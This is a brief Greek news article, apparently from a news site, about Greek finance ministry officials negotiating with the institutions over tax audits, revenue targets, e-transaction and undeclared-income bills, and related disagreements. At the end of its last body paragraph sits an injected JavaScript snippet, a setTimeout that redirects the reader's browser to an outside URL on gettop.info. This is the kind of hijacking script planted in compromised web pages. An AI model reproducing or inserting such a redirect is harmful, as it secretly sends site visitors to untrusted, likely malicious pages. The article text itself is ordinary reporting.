Συνεχίζεται η διαπραγμάτευση – Στο τραπέζι φορολογικοί έλεγχοι και στόχοι εσόδων

0
7

 

Νέα συνάντηση με τους εκπροσώπους των θεσμών θα έχουν ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος, ο αναπληρωτής υπουργός Οικονομικών Τρύφων Αλεξιάδης και ο Γενικός Γραμματέας Δημοσίων Εσόδων Γιώργος Πιτσιλής όπου αναμένεται να συζητήσουν κυρίως φορολογικά θέματα αλλά και τους στόχους του υπουργείου για έσοδα.

Στο τραπέζι της διαπραγμάτευσης αναμένεται να τεθεί και το θέμα των δύο νομοσχεδίων για τις ηλεκτρονικές συναλλαγές και την οικειοθελή αποκάλυψη των αδήλωτων εισοδημάτων. Για τα δύο νομοσχέδια η πρόθεση της κυβέρνησης είναι να τα καταθέσει το συντομότερο στη Βουλή.

Ωστόσο, ακόμη διάσταση απόψεων και διαφωνία παρατηρείται ανάμεσα στις ελληνικές Αρχές και τους θεσμούς σε θέματα όπως αυτά του ακατάσχετου λογαριασμού για τους επαγγελματίες τον οποίο προτείνει η ελληνική πλευρά προκειμένου μέσω αυτού να πραγματοποιούνται οι συναλλαγές με τα POS. Επίσης και στο θέμα των αδήλωτων εισοδημάτων οι εκπρόσωποι των θεσμών ζητούν υψηλότερο φορολογικό συντελεστή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here